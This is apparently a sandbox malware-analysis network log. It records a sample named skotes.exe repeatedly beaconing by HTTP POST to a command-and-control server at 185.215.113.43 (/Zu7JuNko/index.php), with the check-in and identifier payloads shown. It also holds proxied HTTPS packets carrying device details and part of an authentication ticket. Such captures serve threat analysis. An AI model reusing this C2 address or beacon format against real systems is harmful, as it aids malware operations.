                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      137192.168.2.652508185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:30.329292059 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:31.038352966 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:59:30 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      138192.168.2.652515185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:32.561868906 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 160
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:33.269062042 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:59:33 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      139192.168.2.652519185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:34.898715973 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:35.599574089 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:59:35 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      140192.168.2.652520185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:37.130542040 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 160
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:37.837063074 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:59:37 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      141192.168.2.652521185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:39.464742899 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:40.213746071 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:59:40 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      142192.168.2.652522185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:41.736603975 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 160
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:42.468102932 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:59:42 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      143192.168.2.652523185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:44.109185934 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:44.827583075 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:59:44 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      144192.168.2.652524185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:46.342495918 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 160
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:47.100404978 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:59:46 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      145192.168.2.652525185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:48.747395992 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:49.495349884 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:59:49 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      146192.168.2.652526185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:51.025119066 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 160
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:51.721900940 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:59:51 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      147192.168.2.652527185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:53.358913898 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:54.062886000 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:59:53 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      148192.168.2.652528185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:55.591664076 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 160
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                                                                                                                                                                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:56.291002035 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:59:56 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      149192.168.2.652529185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:57.947384119 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:58.647420883 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:59:58 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                                                                      HTTPS Proxied Packets

                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      0192.168.2.64970940.113.110.67443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:09 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 79 74 6b 76 77 35 49 68 79 30 47 45 58 66 37 33 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 66 65 31 33 66 63 38 66 63 32 65 63 33 34 64 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: CNT 1 CON 305MS-CV: ytkvw5Ihy0GEXf73.1Context: 6fe13fc8fc2ec34d
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:09 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                                      Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:09 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 79 74 6b 76 77 35 49 68 79 30 47 45 58 66 37 33 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 66 65 31 33 66 63 38 66 63 32 65 63 33 34 64 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 65 66 61 45 58 74 6d 6c 36 59 73 6a 75 35 41 33 6b 48 47 6f 58 69 47 55 63 59 75 77 47 4c 4e 34 6c 56 75 74 39 70 4e 31 6f 63 52 6d 6f 67 45 58 48 76 30 43 54 44 49 7a 32 30 57 79 45 4c 63 41 67 53 57 68 59 79 71 30 4b 71 2f 35 57 54 4c 68 4f 30 6a 56 63 32 53 6d 45 6a 4a 31 48 6d 4c 30 36 45 6d 4d 32 6c 67 35 71 39 71 48 2f
                                                                                                                                                                                                                                                                                      Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: ytkvw5Ihy0GEXf73.2Context: 6fe13fc8fc2ec34d<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAefaEXtml6Ysju5A3kHGoXiGUcYuwGLN4lVut9pN1ocRmogEXHv0CTDIz20WyELcAgSWhYyq0Kq/5WTLhO0jVc2SmEjJ1HmL06EmM2lg5q9qH/
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:09 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 79 74 6b 76 77 35 49 68 79 30 47 45 58 66 37 33 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 66 65 31 33 66 63 38 66 63 32 65 63 33 34 64 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
